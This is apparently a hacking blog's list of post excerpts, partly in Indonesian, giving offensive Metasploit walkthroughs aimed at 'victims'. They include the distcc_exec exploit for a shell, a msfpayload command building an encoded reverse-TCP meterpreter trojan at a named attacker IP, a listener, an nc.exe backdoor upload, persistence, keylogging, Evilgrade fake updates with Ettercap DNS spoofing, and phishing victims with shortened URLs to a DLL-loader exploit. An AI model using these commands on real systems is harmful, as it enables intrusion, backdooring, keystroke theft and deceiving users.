Art Of Explo1t

Hay guys tonight i will share how to get root privileges to start utilizing the vulnerability gap that exists on the machine "distcc". about distcc: Distcc is designed to speed up compilation by taking advantage of unused processing on another computer. How to : 1. scann the target using the command: nmap -p 1-56635 -sS target-ip-addr then look for port 3633 (distccd) 2. Open your metasploit and enter this command: msf > use exploit/unix/misc/distcc_exec msf exploit( distcc_exec) > set RHOST 192.168.1.10 RHOST => 192.168.1.10 msf exploit( distcc_exec ) > set PAYLOAD cmd/unix/bind_ruby PAYLOAD => cmd/unix/bind_ruby msf exploit( distcc_exec ) > exploit wait until the command shell session opened 3. then use this command : uname -r ( kernel version ) whoami ( print the user name associated with the current effective user ID ) this stage we do not get user id root. so, let's get started privilege escalation make sure the ker...

Evilgrade Description: Evilgrade is a Penetration Testing  tool to inject a fake update into the victim system. There are 63 modules on evilgrade and every modules has a structure that need to imitate or inject a fake update an application / system specific to the victim system and also has its own webserver and dnsserver module so that attacks can be faster at doing the attacker (attacker). will happen "Manipulation Of Victim's DNS Traffic" or we can call it by manipulating / dns trick against traffict victim when the attacker (attacker) is able to create a diversion Hostname. Operation System that I use is Kali Linux 1.0.1 i386. Equipments: * Evilgrade * Ettercap * Metasploit

Equipment : 1. metasploit 2. Ettercap

After performing several times exploitation on windows Xp  I found a new way to gain access meterpreter without having to register set value to the backdoor and run multi handler we again get a meterpreter session

In this post i will combines two weapon, namely: Ettercap  = for dns_Spoof Metasploit = for exploitation Ettercap ==>> to pull the victim to access the ip and port of the attacker Metasploit ==>> to exploit  victim machine OS : Kali Linux For the tutorial please see the video below : Regards By : Hidemichi-Hiroyuki a.k.a [H2]

Hallo guy's =)) Tonight i'm back again to learning exploitation Windows =)) and now i share this tutorial for you all =) oke now just for fun and just for learning =)) First Step : Make a new trojan and encoding trojan using metasploit framework: # msfpayload windows/meterpreter/reverse_tcp LHOST=36.86.3.84 LPORT=4444 R | msfencode -a x86 -c 5 -b '\xff' -e x86/shikata_ga_nai -t exe > /var/www/attacker.exe my IP-Address = 36.36.3.84 saving the trojan.exe in directory /var/www/ with the name attacker.exe then, I send trojan to victim's computer ( you can use MITM to get the attention of the victim ) now, we run a multi handler for listening meterpreter session from victim computer : # msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=36.86.3.84 LPORT=4444 E After getting meterpreter, then we upload nc.exe backdoor to the victim's computer : meterpreter > upload (PATH YOUR Nc.exe) C:\\WINDOWS\\system32\\ the bac...

I tried for the first time pentest tools named Armitage  and it helps me in doing exploits to gain access to the command of computer my target. Equipments: 1. Armitage  2. Metasploit Please download the above equipment if you do not have. OS : Kali Linux how to use it, please see the video below : Auhtor by : Hidemichi-Hiroyuki a.k.a [H2]

I'm come back again to share method exploitation of windows OS. A few days ago, I tried to exploit a windows operating system. I have managed to get a meterpreter, but it's not working because my victim restart his  machine. I do not want to do the re-exploitation. then I figure out how I made it's  run when the victim relive his computer. next, I then managed to get back meterpreter =)) you can see my video below how do i do it. 

Connect to the victim just the wine to call file sbd.exe Equipments: 1. Metasploit "msfpayload & msfcli" 2. Apache2 3. Wine 4. Sbd.exe " Download " Use creativity and art in the exploitation to lure victims into the trap =)) Author By: Hidemichi-Hiroyuki a.k.a [H2]

After successfully with keylogger part 1 , I will give the new section of the next keylogger. Note : we have to get meterpreter session to run keylogger. Check this for video. Created By: Hidemichi-Hiroyuki a.k.a [H2]

Today I will explain how to activate keylogger using metasploit, Note : we have to get meterpreter session to run keylogger after getting meterpreter, then we need to see what applications are being run by victim check this now. Author By: Hidemichi-Hiroyuki a.k.a [H2]

Apa yang harus kita jawab ketika victim bertanya : " Mengapa saya harus menuju alamat IP anda (Attacker) " yah, kita tidak dapat menjawab pertanyaan yang begitu simple dari victim, namun ada beberapa usaha dalam melakukan exploitasi untuk meyakinkan victim agar menuju ke IP si attacker. dalam exploitasi kali ini saya tidak menggunakan MITM untuk memancing attacker. Equipments: 1. msfconsole =>>  Run a Exploitation 2. goo.gl =>>  URL Shortener 3. alpine =>>  Send File to Victim Planning Example Saya melihat ada victim yg sedang mengaktifkan Email ==> kemudian saya mengirim file DLLloader kepada victim ==> dengan iming-iming yang tidak jelas saya membuat victim yakin agar mengklik url yg sudah kita shortener ==> saat victim membuka url tersebut, kita mendapatkan session meterpreter, Victim ! DEATH ! !! First Step Run Exploit: msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader msf exploit(...